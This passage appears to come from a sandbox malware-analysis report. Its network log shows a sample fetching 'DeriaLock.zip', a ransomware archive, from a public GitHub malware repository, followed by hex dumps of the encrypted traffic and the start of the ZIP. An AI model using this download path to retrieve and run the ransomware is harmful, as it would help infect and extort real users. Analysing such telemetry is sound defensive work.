                                                                                                                                                2022-09-29 12:48:31 UTC824INData Raw: 27 8d c0 e7 26 91 fb 60 0b bf f1 6f 26 ab b5 57 3c 89 fd e3 fb dc f6 e2 f5 80 df 70 2e 75 42 75 f5 42 17 31 63 fe 91 be 3e 43 19 0a d1 2e 3d 65 16 45 60 bf b9 29 5e 93 48 d0 9d 1f 1b c5 bf ae ff fa 2f 23 32 d0 15 95 d8 d0 c9 f9 fb ff 22 c0 63 d3 6e 25 d0 ce b3 cf 2a a6 41 dd bf 67 65 46 31 e5 6b ea 95 c7 12 4f 9e 62 0f cf 8c be 61 d8 25 7c a8 0d 93 47 10 79 c5 02 98 56 7e c0 d9 37 70 27 83 be df 6e a2 0f 52 33 a1 fe c1 1e 59 bb 7d fa 58 4f 3e 9b c9 72 d7 f2 31 30 24 55 60 bc 93 62 6d e6 b0 b7 63 af 5b 61 e9 c0 7d 35 9c 95 03 3b 83 f3 97 d9 4e 0d 31 9c be fa e0 0d f1 5d 79 06 4c c1 26 22 1f 30 7b b0 49 7d 24 c5 91 b1 18 64 aa d5 38 d3 57 9c cc 7a ac 5e c9 99 b7 84 a6 d4 a5 42 40 1e 74 55 b9 f0 52 3a af 91 d3 ef 64 1f 81 e0 33 57 03 6c 8a 3e 71 88 9a a5 17
                                                                                                                                                Data Ascii: '&`o&W<p.uBuB1c>C.=eE`)^H/#2"cn%*AgeF1kOba%|GyV~7p'nR3Y}XO>r10$U`bmc[a}5;N1]yL&"0{I}$d8Wz^B@tUR:d3Wl>q
                                                                                                                                                2022-09-29 12:48:31 UTC840INData Raw: 8e cd 32 fa 4e 2b ba 92 94 af f3 89 63 24 ba 3d bc 6b 40 0d dd 62 98 28 1e 1d c2 3b 03 ca 75 4c bf 88 13 44 90 ca c7 97 b3 2a 6d 34 e6 35 1c a6 63 59 1a 30 87 f9 89 8b 66 b1 71 7d b8 bf df 03 83 ff c7 96 e9 15 3c e8 78 0b 6a 9a 04 25 fe a4 36 72 08 4a ac bb ed a9 20 30 bf 96 84 4b df 43 92 87 8c 5a c5 ac 75 38 13 12 88 52 a8 22 35 dd 61 9a 30 24 ef a4 1c 72 ca 5f 5e cf 7f cf 47 b1 9b 5d 47 38 4c 4d 12 3c 07 9d 49 ca 97 b9 b4 c6 e9 fe 6c 48 f3 0f 9c 77 99 be 9c f1 42 77 24 33 cc 2c f0 b0 fa b2 86 f1 02 fe 0c 79 74 cc 33 72 5f c7 1a 96 ac 23 c8 f3 ca ef 09 4f 97 48 ad b6 c1 3b 5d 6c 2e 07 4e f0 b3 7c 36 a0 08 c4 93 41 be 0e 46 a3 06 b9 59 f2 d7 cf f5 e7 c4 44 db ed 1f 47 6d f0 79 3a a3 d1 ff dc 08 bc 10 91 b3 80 ef 50 bd 3e aa 68 ed f6 f6 7d 1f ff 1d 23 ca
                                                                                                                                                Data Ascii: 2N+c$=k@b(;uLD*m45cY0fq}<xj%6rJ 0KCZu8R"5a0$r_^G]G8LM<IlHwBw$3,yt3r_#OH;]l.N|6AFYDGmy:P>h}#
                                                                                                                                                2022-09-29 12:48:31 UTC856INData Raw: a9 17 e7 83 c6 83 6e e7 f0 70 82 cc 29 37 25 bf ea 1e 92 96 71 3d 3d 09 44 93 c2 44 82 d3 e9 94 3e 1d d4 73 92 d0 36 bf 37 83 74 8b b9 e5 48 25 a2 5f 07 ee 20 59 95 c9 f8 f9 ae 80 87 4f 77 7d ba 63 f0 22 12 0e 4f 47 04 c0 9c fb da 46 22 91 d1 35 c1 35 85 20 bb 31 29 d2 02 a9 52 33 25 9d 27 b0 2b 26 c3 48 3a ec cf 4a f1 3b 07 61 3c 7f 6d 66 44 57 19 ee 23 91 15 e0 12 c1 c6 f9 28 1b 8a 52 95 4f 84 ac 2b 56 6f 2d b3 a0 bc 36 61 6b 74 c3 f4 0a dd 4c b0 36 3f c6 0a ad 83 e3 0d dd c3 ba aa d8 0e df f1 81 b7 27 07 ec 07 3c 87 d2 f5 c3 61 02 6e 43 07 5a 4f 79 e7 0f 9d b7 0a 6c 7a 0e c8 67 a5 b2 10 b2 d8 8c ab 2b 18 f1 40 1c 34 0b b0 12 97 d8 ed a0 d7 57 d1 29 b9 e0 ab ff 5f 23 6f df 30 c7 03 57 0f 01 4f eb 3a 45 0f 4a 8a 4b d6 60 b4 80 3d 2f e2 ac b1 8d 15 32 bb
                                                                                                                                                Data Ascii: np)7%q==DD>s67tH%_ YOw}c"OGF"55 1)R3%'+&H:J;a<mfDW#(RO+Vo-6aktL6?'<anCZOylzg+@4W)_#o0WO:EJK`=/2
                                                                                                                                                2022-09-29 12:48:31 UTC872INData Raw: 43 e9 71 77 e9 c7 3d c7 de cc a6 2f 83 4e 91 9d eb 03 12 ab 98 95 4e 57 57 b3 e4 51 0f 22 a7 22 23 da cf f5 b2 d9 e8 69 b3 7a a1 34 a4 ae 7b 5e 8a e1 b1 60 c7 c1 bb 1f b3 46 38 3c d1 0d 94 2b 89 da 10 74 f9 3f a2 37 26 9b e7 b8 4a 5f 72 a2 d3 52 50 64 ca c0 a4 38 05 74 c6 4e 9c 89 6d 7a 9d 5c db 34 0b 05 c2 f0 5e 80 9e 1e 0d ff 65 8c 41 80 57 0e 9e 47 08 0e 04 bc ef 64 42 bd 9d db d7 58 9a 0f d2 00 e5 cf 4d 6d 73 ea 09 76 37 b4 1f bd ea b3 9b 60 96 4b c6 9e 64 d2 5a e5 67 da 26 88 20 b5 af 00 4c 16 69 a0 8c b8 f3 53 d2 74 9a 0b 7e 96 77 89 c8 6f 67 f3 f6 41 99 62 35 89 dc 1b 2b d7 4b 8c 7d 31 f7 18 44 20 61 73 74 16 5f ae 3e bd 68 11 44 9e 7c 92 37 be 6e bf e4 15 3f bd 55 7d 30 34 cd 75 f8 1c 50 ee 2b 1f 69 5f bd 63 17 8e 2a 64 4a 90 8e cb b9 77 fb c9 5e
                                                                                                                                                Data Ascii: Cqw=/NNWWQ""#iz4{^`F8<+t?7&J_rRPd8tNmz\4^eAWGdBXMmsv7`KdZg& LiSt~wogAb5+K}1D ast_>hD|7n?U}04uP+i_c*dJw^


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                16192.168.2.349691140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:33 UTC878OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                17140.82.121.4443192.168.2.349691C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:33 UTC878INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:33 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:48:33 UTC879INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                18192.168.2.349692185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:33 UTC881OUTGET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                19185.199.108.133443192.168.2.349692C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:33 UTC881INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 215551
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:33 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6944-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455714.625616,VS0,VE3
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 4f01e334f11bdf71aeea91002410baa7cb00e22c
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:33 GMT
                                                                                                                                                Source-Age: 262
                                                                                                                                                2022-09-29 12:48:33 UTC882INData Raw: 50 4b 03 04 14 00 01 00 08 00 b9 44 9d 49 fb a7 08 f7 49 49 03 00 00 90 07 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 44 65 72 69 61 4c 6f 63 6b 2e 65 78 65 8f 5e c1 d2 4e 0d 5f 39 3e ec 9e 1a 00 e0 ba e5 f5 be 9e 96 4e e6 01 53 65 32 9c ef 35 79 aa 89 be e7 a1 c5 67 ef 92 69 5f 6a cd 1e 64 76 70 1a 6a aa 4b 9a fa 65 0d 36 ac dc 2d fa 18 41 f4 90 27 10 c4 f7 86 51 d7 e1 38 f9 19 23 6a 06 4f b5 90 c1 dd c3 23 3c 19 77 e3 44 06 84 ce 90 3c c2 c7 5f 60 30 36 92 57 7f 96 fa 21 09 c1 ef 1a 4b 1b dd 2c 93 f5 d6 b9 79 75 8a 42 65 ef 69 bf c5 84 8a 58 98 3b 72 e6 2b a7 c3 d9 22 01 60 13 a6 b8 0a 02 a3 ac 92 01 17 24 1f 36 a3 d5 4a 7e fc d3 56 64 b6 8b 10 96 4c 8b 86 ef 7b 8c dd af 2b b6 2c 1f b6 9f 38 6c 79 5c 08 53 02 ea be fc 69 9a ee fb 19 3c 74 bb 8d 5e
                                                                                                                                                Data Ascii: PKDIIIEndermanch@DeriaLock.exe^N_9>NSe25ygi_jdvpjKe6-A'Q8#jO#<wD<_`06W!K,yuBeiX;r+"`$6J~VdL{+,8ly\Si<t^
                                                                                                                                                2022-09-29 12:48:33 UTC883INData Raw: 94 c5 72 fa c2 61 fb 91 6f d4 4d 42 a4 e2 fd 95 ef a3 4a c6 21 f1 04 3c d2 65 f4 87 54 3b b1 d9 24 6b bb 53 35 98 8a 46 94 13 e5 e5 71 37 5e a0 a4 3f de 39 e4 f7 0f 6c ae 3b 7d e2 9f 02 68 e9 7a 0f 04 0f 84 99 12 17 84 40 6a 21 45 6e ab a8 1c ad 5b fd 63 f9 d6 b7 03 b3 08 85 3a ff 28 c3 ce f2 4e 28 9a 06 ba bd b1 c1 c6 1d 18 8c c8 75 9a 08 e7 6c 69 b8 f9 2c ac ff 76 1e 5e 31 2f 04 2d 59 0f 0a f1 3d ad fe da ff 60 35 1e 9f 9d fe a7 48 5e 42 0a b7 4a 71 86 b0 e6 0f 22 37 8f 61 c6 d8 4b 4e fd 68 7d 39 85 cc 2d 7f 8c 69 8b e4 87 12 20 eb ad ec ff 34 6a 74 ce a1 3f ea 35 4f b0 e6 0e 10 6e e4 e9 e4 09 a9 52 52 6e 8d d1 a3 dd 76 d9 20 a7 64 70 a8 c7 f8 a9 2e f1 15 0c b6 22 f1 61 65 01 fb 6e 71 61 84 fb 5d c9 b5 52 52 68 f3 91 fd 77 47 da 1b cc 5d 1a 62 0f 15 2e
                                                                                                                                                Data Ascii: raoMBJ!<eT;$kS5Fq7^?9l;}hz@j!En[c:(N(uli,v^1/-Y=`5H^BJq"7aKNh}9-i 4jt?5OnRRnv dp."aenqa]RRhwG]b.
                                                                                                                                                2022-09-29 12:48:33 UTC884INData Raw: cc 05 3d e1 b2 30 5b de b2 9b d9 d6 ea ab b5 85 1b 89 f4 ee de e4 8b 82 3a e3 6f 98 0e 69 a4 4a 2e 2a 96 04 cd 1b e0 65 13 c3 4a 40 9d 44 04 e8 a1 fb 80 50 b2 06 cc 12 bd 98 b4 82 db 35 c7 66 6b 16 d7 3f a8 61 a3 f5 3d 63 4d b6 f1 8f ef e0 0d 11 e8 2b 3e e4 4e a3 4a a5 d6 fe 96 93 dd 4c bc e2 8e 68 31 5b 64 91 7e f0 77 34 f8 29 a9 ab 7a 16 db 82 b8 5b a1 c1 7f 0a c5 b2 6c 46 82 28 54 17 10 1f dd 03 e2 4b 23 e9 5e 0d aa 2a 56 cd b9 dc 53 bf dd fc cf 38 80 26 02 b1 1b 19 b9 63 2d 94 8f e9 5a 65 0b 9a 0b 97 8d 9e 9d d0 9d 6e 52 5e 88 67 34 e3 cd ed a8 6a 1d 92 5c d2 ba 45 05 8e 75 6b 4d da 87 f9 0e f4 be fa 0f 3c 36 11 0e ab 28 64 11 7b 52 fb ce c0 43 99 2e 2a 72 6e 53 27 e6 59 7d 32 18 70 28 f6 1c c1 93 a0 10 cf 8c 1b 83 f0 f3 7d fe b9 c5 61 70 07 72 f1 4c
                                                                                                                                                Data Ascii: =0[:oiJ.*eJ@DP5fk?a=cM+>NJLh1[d~w4)z[lF(TK#^*VS8&c-ZenR^g4j\EukM<6(d{RC.*rnS'Y}2p(}aprL
                                                                                                                                                2022-09-29 12:48:33 UTC886INData Raw: 9b 61 d3 15 e1 24 fe 26 e5 91 eb af 6a 86 10 ed ae 06 0e 8f c4 a1 c0 45 4d 9d 33 c0 fd 40 f7 6d 09 4e cc ee 84 c9 07 3b 6d c4 21 7b 31 2a 1f 56 12 c6 e5 da ef e7 95 fd 9b d7 29 d7 fd 86 54 27 af ce 04 86 09 32 4a 79 6a 97 0a dd 2f 97 a1 08 e5 1e 72 35 5f 7d ec 5b 70 39 a1 01 2d a5 85 44 69 16 87 fd d4 2a 46 22 a0 93 ea 40 c5 22 f6 70 7d a8 05 a7 fa b2 23 0b 73 ce 0c 13 94 6d 09 29 37 be d8 50 30 c1 2f 01 b9 51 af 19 0a 7b 21 a1 54 df 6d 7b b9 c0 91 ee 4f bb 3b a8 7d f1 90 9a b6 e7 3e f4 d4 c1 e2 af 89 6c ef 9c 3d 2e 39 1a 79 d9 60 70 a8 21 26 6f 3f fc a7 13 c0 f3 77 5c e7 b4 ee c8 f5 a8 83 de 12 e7 3c cc 62 66 e2 86 53 6f df ec e9 b2 7d 3a f1 4f 95 7b a5 82 f0 47 04 43 b6 ef 99 e4 41 be 7d 82 25 0f c3 ab 00 8b 57 83 b0 9e 76 71 64 35 a7 63 1f d8 bc 8a 90
                                                                                                                                                Data Ascii: a$&jEM3@mN;m!{1*V)T'2Jyj/r5_}[p9-Di*F"@"p}#sm)7P0/Q{!Tm{O;}>l=.9y`p!&o?w\<bfSo}:O{GCA}%Wvqd5c
                                                                                                                                                2022-09-29 12:48:33 UTC887INData Raw: d3 e8 bb 24 8e f5 8a e1 3d cb 76 c8 f2 e8 a8 d7 25 e2 4c 09 4a ea fe 7b 03 31 32 30 a1 eb 9e 30 07 dc 62 14 e5 ae e8 1b cf b0 b7 9d 9e 36 15 47 9b 61 30 45 ad 52 eb 36 8c 12 62 37 23 77 9d 2b 5b 5d 30 2e 66 45 dc 82 54 b4 9f 25 0a 38 5c c7 1d 53 a7 a9 77 6c 83 be fe b8 44 29 da f2 53 f8 36 04 92 a3 8e 40 e1 ec cb fa d4 93 45 f0 ff 4a ee 63 d8 33 55 32 86 d0 f3 31 01 03 2e c0 c8 f7 44 87 17 f6 77 a0 ac fa 44 36 04 de 37 88 f2 00 78 86 35 f4 f8 e5 6b c3 e6 6c 6b 8a 05 d1 08 24 8f 37 16 71 80 b4 39 95 7a 03 0b 3f 78 4c 7a a2 e2 60 3a 37 03 8f 31 74 70 4a fd 2a 4c dd d2 4d d2 b2 07 8d 86 c5 a3 6f 4b 9c ca 33 c4 00 d9 92 3a 35 96 e8 9a bb c4 e5 47 32 0c de da 22 5b 09 fe 51 51 ad 1c 39 c0 8b 72 da 41 34 da 40 98 40 f7 8a 48 6f 7d 74 ee c3 8b de 61 de be 5c 1b
                                                                                                                                                Data Ascii: $=v%LJ{1200b6Ga0ER6b7#w+[]0.fET%8\SwlD)S6@EJc3U21.DwD67x5klk$7q9z?xLz`:71tpJ*LMoK3:5G2"[QQ9rA4@@Ho}ta\
                                                                                                                                                2022-09-29 12:48:33 UTC888INData Raw: 4c 6e 17 60 26 d6 b8 2e bc b8 0d 14 1e 68 07 de cf 2f 81 06 53 f1 d8 f3 11 de 51 ea 61 eb 05 13 7d 9a 74 47 4b 9b 5b 9b cb da 88 a7 70 b3 99 c4 db 0a 4d f6 1f 23 3f a4 4a c8 c6 87 5a d7 14 bf 84 8c e3 c2 2f 0d 54 60 01 d3 e3 25 94 bb e1 fa 9c 24 8e 24 b2 85 0f 8c 1c bf dd aa 8f 92 76 d5 10 55 e9 85 e7 3f a6 59 e6 50 ea 58 74 3e e9 36 81 7f 64 fa 3d 2d 78 01 5f 76 dc a2 aa 15 e9 21 58 84 62 54 a9 c2 c3 4f 8d 5e 92 7c f6 fc 53 88 79 83 10 94 e5 97 f1 da 66 01 50 66 eb e7 cf 9d da 9e 12 df 93 e5 d7 22 f3 de b2 12 d0 91 6d 2a 62 e1 b2 d3 0b 75 44 54 06 5e aa 8c 78 07 bc 88 1d a0 78 d6 16 59 a0 68 f6 5c ed 3e cf 43 03 b9 49 7f 13 40 00 25 6e 91 23 17 61 91 78 8e ed 54 1a d4 f0 ae 13 d1 99 ef 2a 27 e5 c3 89 c7 db 69 dc 5e ab ab 84 46 e2 f8 0d a2 33 db c1 f2 18
                                                                                                                                                Data Ascii: Ln`&.h/SQa}tGK[pM#?JZ/T`%$$vU?YPXt>6d=-x_v!XbTO^|SyfPf"m*buDT^xxYh\>CI@%n#axT*'i^F3
                                                                                                                                                2022-09-29 12:48:33 UTC890INData Raw: 63 e3 68 e4 c6 9e e2 a3 8a e6 d7 62 10 67 57 ba e7 b9 c7 5a ab d4 1e 61 6b 7a e6 9e 78 da ba 6b 52 b8 00 21 07 0a c2 7d 23 1e da b9 80 18 e8 90 73 f1 40 9a b3 d6 8d cb fb 2b 97 be 02 7f b4 d3 39 95 af f4 72 63 1e f6 a2 da 49 87 cb 47 ce 05 7e c2 a2 bb 0f b0 5a d1 c7 0a a9 da 0e 24 29 3f 0a 03 eb cb 00 ef 15 6f 51 b5 c1 80 75 05 95 a1 e3 df e0 2d d6 cb 6a ab 53 f8 c4 8f 5b 90 16 7d c9 24 31 2f 8e 42 1f dc 33 f6 58 5f 96 e6 28 f9 68 63 11 67 1c 83 37 a5 ad 2e bb a0 e0 7c 62 ef 1d 2a 07 18 7a d4 d0 f0 41 97 89 fe 2e 6b 2f 72 9d 4d ce 6e 94 a6 61 a8 78 87 d8 1b e4 6c b5 ce 4b b5 4f ce 55 4f c4 7c 10 59 6b de 43 3d 1d 4d 6f 20 d5 10 92 32 d3 d0 b1 1e 16 fd 92 52 22 75 ac 25 04 23 30 66 49 aa 72 ab 57 e1 17 ac aa b6 02 5a 01 0d bf bc ee 23 7f e9 39 c4 b9 8c 4a
                                                                                                                                                Data Ascii: chbgWZakzxkR!}#s@+9rcIG~Z$)?oQu-jS[}$1/B3X_(hcg7.|b*zA.k/rMnaxlKOUO|YkC=Mo 2R"u%#0fIrWZ#9J
                                                                                                                                                2022-09-29 12:48:33 UTC891INData Raw: c0 16 26 bf 4d d1 e2 51 32 8a 2b 03 c7 b7 f9 d1 0e 3d 2e aa ef de a2 03 b0 5f d8 33 90 de e8 7d 7b fc 48 a0 da c8 f5 c6 86 d8 96 eb 2b 47 41 91 97 3f 56 0f 04 69 e4 bc a0 ad a2 df 3a 88 d6 91 74 0d 11 63 75 81 a5 a3 9f 28 0a 78 4b bf a8 30 80 42 bd cd 1f 1a 01 5b a2 14 9c 88 c1 a5 1e 59 09 b5 4b da 67 69 01 ca b1 f9 a0 91 aa 84 41 bd 2c b6 d1 46 be 13 2d 8d 9f 2c 4b ef 0c ae 79 6c d4 de d0 be 9f 45 8f e9 ef 5e 26 fb ad 99 0a 25 df b8 fc 04 3a 36 81 83 80 09 94 dd dd 8c 1d e1 d4 51 ce 78 3c 64 d6 04 0f ee dd 54 ac 34 ba c5 3c eb ee 1f 80 3a 91 8f ea 5a 85 94 67 c9 bf 4f fc 1f 6e 48 dc 90 bc 11 9f 39 86 d0 a1 f4 13 f9 f8 86 94 63 97 b2 0c f9 ef 6d b4 7e 94 fe fe 0d 2a 15 d9 58 f9 f2 c4 b8 6d af 6a 14 b8 9a 0b b7 09 73 1b 41 e8 53 d5 d7 5e 83 a4 07 00 5c e2
                                                                                                                                                Data Ascii: &MQ2+=._3}{H+GA?Vi:tcu(xK0B[YKgiA,F-,KylE^&%:6Qx<dT4<:ZgOnH9cm~*XmjsAS^\
                                                                                                                                                2022-09-29 12:48:33 UTC892INData Raw: 4d 75 31 64 cd 2b 67 52 d1 94 ed a5 1e 34 cb 3d 1d 89 90 b0 dd 42 2c 1b e6 9d 8b 1d 63 62 0e f2 67 1e d0 72 19 41 97 fb a7 32 20 81 12 5d 2d fa 6e cb 7a ce 85 ac 3c 78 01 ba 59 39 79 9b c6 6b b5 68 82 d7 4b 64 75 6e 8c fb 80 3a 9e 4a c8 df 93 cb 87 51 79 6f a1 b0 34 77 4a b3 a6 6e 3b 55 a3 7d 93 c7 64 35 e9 33 1c 52 35 db c6 e3 c5 15 c0 24 df 09 5c 7c 94 f4 8f ae d9 c8 a9 5f c6 8c 5c 83 e1 17 3e 85 67 c4 a6 cc f6 cd 8a ad db 36 87 25 5f ed 93 48 ab 2d 8c 2a ee e5 21 c4 f0 d8 89 33 41 9a 16 14 69 b3 2d e5 06 c4 65 37 f7 ef 13 b7 a2 bd 1c 59 97 cb a2 c1 68 7b 4f d3 2d b0 d5 13 06 53 5a 4d a8 55 ad d3 90 80 6f 0d 3e 5f 60 fd f5 b1 61 09 0d 57 ee f7 53 d6 9c 37 22 54 29 95 cb 7e dd 06 85 b0 a5 a6 8a 63 d3 91 3b 0e 87 53 7c 5d 33 ba 80 3a ed 7f fb b4 dd 5e 27
                                                                                                                                                Data Ascii: Mu1d+gR4=B,cbgrA2 ]-nz<xY9ykhKdun:JQyo4wJn;U}d53R5$\|_\>g6%_H-*!3Ai-e7Yh{O-SZMUo>_`aWS7"T)~c;S|]3:^'
                                                                                                                                                2022-09-29 12:48:33 UTC894INData Raw: 12 e0 6c 86 d1 e9 5a 55 44 35 21 e0 80 b1 1d da 3e f3 c1 e9 a1 0e 23 54 85 3c 8b 40 73 1f 4e 6e 31 07 39 c7 76 fb 98 c0 66 2b 8e f3 6f 3d 5b 84 4c a0 0d c8 94 ea d4 08 68 66 34 01 8f fc 37 4f 91 24 a2 32 4d b0 42 1f 91 d9 60 ed 91 9d ef 2e 97 a6 64 07 b2 66 e8 68 64 a1 27 b1 5f cd 33 6c cf 77 e6 bb 13 03 b3 ea 39 4e d7 4b 15 38 cb b6 71 64 45 43 c9 c4 b1 13 cd bf d9 e4 a5 6d 8b 19 d6 a2 77 ff 04 64 f0 b9 e7 9c 5b 3a 9b 85 05 c0 0a 93 20 e2 99 1e 84 a8 e0 b3 57 8b 06 01 1e 6b 9f b0 84 f1 cf c5 d1 2a 19 a4 91 e7 45 36 b4 1c 7f c0 99 0d 69 e0 e0 c1 96 1e e1 69 7a 53 b4 af b9 5b 6b 8a c3 ee e0 91 9b 0b 20 d4 99 50 13 19 06 0a d8 02 73 f6 e2 4d 79 51 26 ec ff 26 ed 51 23 46 c0 e3 74 ad ce 1c ae be f3 ca 16 ef e2 d4 55 c6 bc 92 ad 27 56 a1 9d 91 f0 b2 4c 09 0b
                                                                                                                                                Data Ascii: lZUD5!>#T<@sNn19vf+o=[Lhf47O$2MB`.dfhd'_3lw9NK8qdECmwd[: Wk*E6iizS[k PsMyQ&&Q#FtU'VL
                                                                                                                                                2022-09-29 12:48:33 UTC895INData Raw: 46 d1 b9 9e 1a d4 b4 27 0d 2c b8 89 e0 00 8e 49 51 66 fb 18 bb b8 a8 d9 9f bd f6 ce a7 24 cc a1 ae 02 a0 98 b0 36 18 85 f6 bd 70 2f 7c 15 b8 7f 45 c0 89 eb dc 8a 2c 75 81 c5 9f 71 52 34 73 03 9c 32 ed 98 68 a6 bb a5 42 90 67 f2 2e 34 74 6a 29 82 60 b7 61 f6 5f 5b 7c 4d 19 75 33 ec 52 f8 eb 3a f4 ef 3a 56 2f 93 1d e3 b6 00 80 2d 79 15 c7 a6 95 e4 25 3c f8 f2 08 e8 46 9d 5e 01 1a 0f a8 a2 fc 5f b2 8a 7a 7a 35 3c 8c cc fe 72 c5 51 61 f5 cb 7a c7 79 39 49 3d c4 3f 34 73 a9 d0 12 78 c1 23 65 9b 86 ca 78 aa 54 b4 23 dd c0 7e 8e 07 21 d7 b3 7d d3 aa 46 7c 95 54 a5 51 ae 3d 30 04 3b 18 27 21 70 85 14 04 ac a3 90 8c 85 d7 81 aa 2c e5 24 a4 18 7f f0 45 33 27 df e3 9b 94 e8 05 f2 51 9f 21 c8 ee b8 40 73 68 15 72 6f f8 42 1b 38 a5 ca 66 ab 32 1d 91 b7 2d 4a f1 01 bc
                                                                                                                                                Data Ascii: F',IQf$6p/|E,uqR4s2hBg.4tj)`a_[|Mu3R::V/-y%<F^_zz5<rQazy9I=?4sx#exT#~!}F|TQ=0;'!p,$E3'Q!@shroB8f2-J
                                                                                                                                                2022-09-29 12:48:33 UTC896INData Raw: f5 17 48 83 11 6c 16 33 8c 94 48 d1 b4 fe 32 cc a4 83 bc 13 76 af 2d 2c 8f f9 3d bb 08 71 85 5e 1a 07 23 ef dd e1 3d 9e 6d 91 36 9f b9 b7 f2 48 49 70 1e 07 4b 4b b1 00 a1 48 71 45 a8 96 0b 8c 24 8a e2 40 c5 df 95 16 ca 89 da 22 d2 43 74 38 31 5e b1 4e 84 03 42 87 03 bc 4e 92 37 93 ab 84 a2 43 e3 f1 e1 6a ed 31 be 64 cc e4 03 33 1b b1 36 a0 d9 d1 70 d2 c7 3f 81 0d 14 3b 45 48 62 64 e6 cb 7b 47 3c 44 d0 63 27 b4 9f ac 3c 18 04 3c ce 7a 8c 8b e9 16 b0 e6 3d 27 1c 2a cb 83 d1 96 d5 1b 6e 1b b4 4c a7 7d 3a 40 8e ae bd 6c f2 c1 62 ba 7a af 33 3e ef 05 4c 45 58 3a 1e ec fb 49 ec 38 fb 04 5c 07 ff 8e eb fb 6b 42 72 24 e1 c3 c1 93 14 fe 47 ef 83 2b be 72 51 ec 1e f7 8e af 9a e9 3d a5 e5 21 df 81 34 1d 7f a4 6a 6c 3e 2e 18 e3 1e e8 46 5f 90 1d ef 19 46 5f 03 11 ae
                                                                                                                                                Data Ascii: Hl3H2v-,=q^#=m6HIpKKHqE$@"Ct81^NBN7Cj1d36p?;EHbd{G<Dc'<<z='*nL}:@lbz3>LEX:I8\kBr$G+rQ=!4jl>.F_F_
